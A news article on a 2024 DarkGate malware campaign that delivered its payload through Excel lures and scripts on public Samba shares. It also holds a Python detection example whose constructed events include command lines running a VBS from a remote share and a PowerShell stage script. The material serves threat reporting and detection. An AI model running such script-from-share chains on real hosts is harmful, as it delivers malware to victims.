Cybersecurity researchers have disclosed a short-lived DarkGate malware campaign that leveraged Samba file shares to initiate the infections.
Palo Alto Networks Unit 42 said the activity spanned the months of March and April 2024, with the infection chains using servers running public-facing Samba file shares hosting Visual Basic Script (VBS) and JavaScript files. Targets included North America, Europe, and parts of Asia.
“This was a relatively short-lived campaign that illustrates how threat actors can creatively abuse legitimate tools and services to distribute their malware,” security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh, and Brad Duncan said.
DarkGate, which first emerged in 2018, has evolved into a malware-as-a-service (MaaS) offering used by a tightly controlled number of customers. It comes with capabilities to remotely control compromised hosts, execute code, mine cryptocurrency, launch reverse shells, and drop additional payloads.
Attacks involving the malware have notably witnessed a surge in recent months in the aftermath of the multinational law enforcement takedown of the QakBot infrastructure in August 2023.
The campaign documented by Unit 42 commences with Microsoft Excel (.xlsx) files that, when opened, urge targets to click on an embedded Open button, which, in turn, fetches and runs VBS code hosted on a Samba file share.
The VBS script is configured to retrieve and execute a PowerShell script, which is then used to download an AutoHotKey-based DarkGate package.
Alternate sequences using JavaScript files instead of VBS are no different in that they are also engineered to download and run the follow-up PowerShell script.
DarkGate works by scanning for various anti-malware programs and checking the CPU information to determine whether it is running on a physical host or in a virtual environment, thereby allowing it to impede analysis. It also examines the host's running processes to determine the presence of reverse engineering tools, debuggers, or virtualization software.
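One way a defender could flag the Office-to-script-host-to-PowerShell chain described above in endpoint telemetry, as an added example that is not part of the Unit 42 report; the process events, file paths and the 203.0.113.10 share address are constructed for illustration:

```python
import re

# Constructed sample process-creation events, loosely modelled on Sysmon Event ID 1
# fields (pid, parent pid, image path, command line). Not real telemetry.
EVENTS = [
    {"pid": 4100, "ppid": 900, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": r'"EXCEL.EXE" C:\Users\alice\Downloads\invoice.xlsx'},
    # Excel launched a script host with a UNC path to a remote (Samba) share
    {"pid": 4200, "ppid": 4100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe \\203.0.113.10\share\update.vbs"},
    # the script host then spawned PowerShell (the follow-up stage in the article)
    {"pid": 4300, "ppid": 4200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\Users\alice\AppData\Local\Temp\stage2.ps1"},
    # benign control: Excel opening a local workbook with no script-host child
    {"pid": 5100, "ppid": 900, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmd": r'"EXCEL.EXE" C:\Users\bob\Documents\q1.xlsx'},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# \\host\ at the start of a UNC path (host = name or IPv4 literal)
UNC_RE = re.compile(r"\\\\[\w.-]+\\")


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_office_unc_script_chains(events):
    """Return one hit per script host that was started by an Office process with a
    UNC path on its command line; each hit lists any PowerShell children."""
    by_pid = {e["pid"]: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e)
    hits = []
    for e in events:
        unc = UNC_RE.search(e["cmd"])
        if basename(e["image"]) not in SCRIPT_HOSTS or unc is None:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in OFFICE_APPS:
            continue
        ps = [c["pid"] for c in children.get(e["pid"], []) if basename(c["image"]) == "powershell.exe"]
        hits.append({"office_pid": parent["pid"], "script_pid": e["pid"],
                     "share": unc.group(0), "powershell_pids": ps})
    return hits


if __name__ == "__main__":
    for hit in find_office_unc_script_chains(EVENTS):
        print("suspicious Office -> script host -> PowerShell chain:", hit)
```

The rule keys on the structure of the chain (parent/child relationship plus a UNC share path), not on file names or hashes, so it survives the VBS/JavaScript variation the article mentions.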
“DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” the researchers said.
“As DarkGate continues to evolve and refine its methods of infiltration and resistance to analysis, it remains a potent reminder of the need for robust and proactive cybersecurity defenses.”